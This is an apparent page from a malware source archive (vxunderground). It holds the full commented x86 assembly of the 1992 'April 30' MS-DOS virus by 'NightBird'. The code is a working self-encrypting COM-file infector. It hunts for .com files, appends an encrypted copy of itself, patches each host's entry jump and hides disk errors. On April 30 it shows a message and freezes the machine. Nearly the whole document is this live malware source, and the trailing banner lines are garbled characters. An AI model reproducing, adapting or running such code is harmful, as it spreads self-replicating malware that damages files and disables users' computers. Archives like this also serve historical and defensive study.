MalwareSourceCode/MSDOS/A-Index/Virus.MSDOS.Unknown.april30.asm
vxunderground 4b9382ddbc re-organize
push
2022-08-21 04:07:57 -05:00

255 lines
12 KiB
NASM
Raw Permalink Blame History

;******************************************************************************
;* Written in *
;* April 30 Virus - Strain A A86 V3.22 *
;* ---------- *
;******************************************************************************
;* "NightBird goes, *
;* Along with the Queen..." *
;******************************************************************************
; Your are now looking at the result of my very first attempt to code
; a Virus. This virus is a non-Resident Self- encrypting Direct Action
; Com Infecter, which doesn't infect Command.com. The Virus is only active
; on April 30, showing the Message and Hanging the System.....
; You can recognize an infected File simply, the 4th Byte is a 'N'ightBird.
;
; Disclaimer: The Author will not be held responsible for any actions
; caused by this Virus.
;
; Note: Don't just say: " another booring virus.. ", instead
; be a teaching aid, and search for my pitfalls, (ofcoz
; if there are any!), so I can improve my code....
; Please do so.....
;
; Enough of that crap talk,
; Greetingz go to... : John Tardy / TridenT and all other Members..
; : Serge of (Ex) House Designs
; : All Virus-Writers around the globe
;
; Well that's it for now.....
;
; C U & Have pHun,
; (c) NightBird Dec. 1992.
org 100h ; Produce a Com File
Start: jmp Prog ;
db 'N' ; Virus ID
Prog: Push ax ; Save Possible Errors
call Main ; Get Virus
Main: pop bp ; Offset
sub bp,offset Main ; IP = BP
lea si,Restore[bp] ;
mov di,si ;
mov cx,CrypterLen ; Decrypt
Decrypt: lodsb ; the
Key: Add al,0 ; Virus
stosb ;
loop Decrypt ;
Decryptlen equ $-Prog ;
Restore: lea si,[bp+Restore_Host] ; Restore
mov di,100h ; the Original
movsw ; 4 Bytes of the
movsw ; Host Program
mov ah,2ah ; Is it
int 21h ; the 30 of
cmp dh,4 ; April?
jne Start_Virus ; Yes, Show Txt
cmp dl,30 ; No, Continue
jne Start_Virus ; with Start_Virus
mov ah,09h ;
lea dx,Txt[bp] ; Show Txt
int 21h ; And lock
HyperSpace: cli ; the Computer
jmp HyperSpace ;
Start_Virus: mov ax,3524h ; Get Adress of
int 21h ; Interrupt 24h
lea Oldint24h[bp],es ; Store
lea Oldint24h+2[bp],bx ; them...
push cs ; Cs = Es
pop es ; Register
mov ax,2524h ; Install a new
lea dx,Newint24h ; Int. to suppres
int 21h ; Errors..
mov ah,1ah ; Move DTA
mov dx,dta ; to a save
int 21h ; place
mov ah,4eh ;
Search: lea dx,[bp+Filespec] ; Search
xor cx,cx ; for a com file, and
int 21h ; and quit if error
jnc Found ;
jmp End_Virus ;
Found: cmp word ptr [bp+offset dta+35],'DN' ; Check If Command.com
je Find_Next_one ;
mov ax,4300h ; Fetch file
mov dx,dta+1eh ; Attribute
int 21h ; and store it
push cx ; on stack
mov ax,4301h ; Set attribute
mov cx,cx ; for use
int 21h ;
mov ax,3d02h ; Open file
int 21h ; Dx = 0fd1eh
xchg ax,bx ; BX = FileHandle
mov ax,5700h ; Get file/date
int 21h ; format and
push cx ; store them
push dx ; on stack
mov ah,3fh ; Read 4 Bytes
lea dx,[bp+Restore_Host] ; and save
mov cx,4 ; them..
int 21h
mov ax,[Restore_Host+bp] ; Check
cmp ax,'MZ' ; if it is
je Exit ; a renamed
cmp ax,'ZM' ; Exe-File
je exit ;
mov ah,[bp+Restore_Host+3] ; Check if Already
cmp ah,'N' ; infected
jne Infect
; Jump to Sub-Routine
Exit: Call Close
Find_Next_one: mov ah,4fh ; Try Another
jmp Search ; file...
Infect: mov ax,4202h ; Move File
xor cx,cx ; Pointer to
xor dx,dx ; the End of
int 21h ; the File
cmp ax,0fb00h ; File too
jae Exit ; Big
cmp ax,Minlen ; File too
jbe Exit ; Short
sub ax,3 ; Save Jmp
mov word ptr [bp+Jmp_to_Virus]+1,ax ;
Zero: mov ah,2ch ; (If the key
int 21h ; is 0,go Zero)
cmp dl,0 ;
jne Continue ; Get Seconds
jmp Zero ; to save as
Continue: mov key+1[bp],dl ; Decrypter-Key
lea si,[Prog+bp] ;
mov di,0fd00h ; Move the
mov cx,Decryptlen ; Decrypter
rep movsb ; Part
lea si,Restore[bp] ;
mov cx,Crypterlen ; Decrypt behind
Encrypt: lodsb ; the
Sub al,dl ; Decrypter
stosb ;
loop encrypt ;
mov ah,40h ; Write Virus
lea dx,0fd00h ; at the end
mov cx,virlen ; of the file!
int 21h ;
mov ax,4200h ; Move File
xor cx,cx ; Pointer to
xor dx,dx ; the start of
int 21h ; the file
mov ah,40h ; Write Virus-Jmp
lea dx,Jmp_to_Virus[bp] ; to the begin
mov cx,4 ; of the file
int 21h ;
call close ; Jump to Sub-Routine
End_Virus: mov ax,2524h ;
lea bx,Oldint24h[bp] ; Restore Old
mov ds,bx ; (Critical Error)
lea dx,Oldint24h+2[bp] ; Interrupt 24h
int 21h ;
push cs ; Cs = Ds
pop ds ; Register
mov ah,1ah ;
mov dx,80h ;
int 21h ; Restore DTA
pop ax ; and go back
mov di,100h ; to the Host
push di ; Program
ret ;
Close: pop si ; Fetch IP from Stack
pop dx ;
pop cx ; Restore
mov ax,5701h ; Date/Time
int 21h ;
mov ah,3eh ; Close
int 21h ; File
mov ax,4301h ;
pop cx ; Restore File
mov dx,dta+1eh ; Attributes
int 21h ;
push si ; Restores IP
ret ;
Newint24h: mov al,3 ; Suppres Errors
iret ; & Go back
Oldint24h dd 0
Restore_Host db 0cdh,20h,0,0
Jmp_to_Virus db 0e9h,0,0,'N'
Filespec db '*.com',0
Txt db 13,10,9,9,'"NightBird goes,',10,'Along with the Queen..."',13,10,7,'$'
Names db '*April 30 Virus*'
Dta equ 0fc00h
Crypterlen equ $-Restore
Virlen equ $-Prog
Minlen equ Virlen*2
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ReMeMbEr WhErE YoU sAw ThIs pHile fIrSt <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ArReStEd DeVeLoPmEnT +31.77.SeCrEt H/p/A/v/AV/? <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>